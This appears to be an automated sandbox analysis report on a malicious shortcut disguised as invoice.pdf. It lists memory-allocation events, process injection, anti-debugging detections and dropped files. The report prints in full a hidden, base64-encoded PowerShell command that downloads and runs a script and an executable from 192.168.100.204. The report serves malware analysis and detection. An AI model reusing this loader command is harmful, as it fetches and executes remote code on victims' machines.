NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050be000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:14 p.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\invoice.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -w hidden -exec bypass -encodedcommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AAoACgAjACQAZABhAHQAYQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAbgB2ADoAOgB1AHMAZQByAGQAbgBzAGQAbwBtAGEAaQBuACkAKQAKACMAJABkAGEAdABhACAAPQAgACQAYwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAwAC4AMgAwADQALwBhAHAAcAAvAGcAZQB0AC8AcwB0AGEAdAB1AHMAPwBkAD0AIgAgACsAIAAkAGQAYQB0AGEAKQAKACMAaQBmACAAKAAkAGQAYQB0AGEAIAAtAG4AZQAgACcAMgAwADAAJwApACAAewAgAGUAeABpAHQAIAB9AAoACgAkAGQAYQB0AGEAIAA9ACAAJABjAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwADAALgAyADAANAAvAGEAcABwAC8AYQB1AHQAaAAiACkACgAkAGQAYQB0AGEAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAYQB0AGEAKQApAAoACgAkAGMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAwAC4AMgAwADQALwBhAHAAcAAvAGkAbgB2AG8AaQBjAGUALgBwAGQAZgAiACwAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAaQBuAHYAbwBpAGMAZQAuAHAAZABmACIAKQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAHcAYQBpAHQAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAaQBuAHYAbwBpAGMAZQAuAHAAZABmACIACgAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAZABhAHQAYQAKAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABpAG4AdgBvAGkAYwBlAC4AcABkAGYAIgAKAA==

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 18, 2023, 6:14 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 18, 2023, 6:14 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\invoice.pdf

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\invoice.pdf

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

C:\Users\test22\AppData\Local\Temp\invoice.pdf

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3052 resumed a thread in remote process 1376
NtResumeThread July 18, 2023, 6:14 p.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 1376	1	0	0

Creates a suspicious Powershell process (4 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

192.168.100.204:80

invoice.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All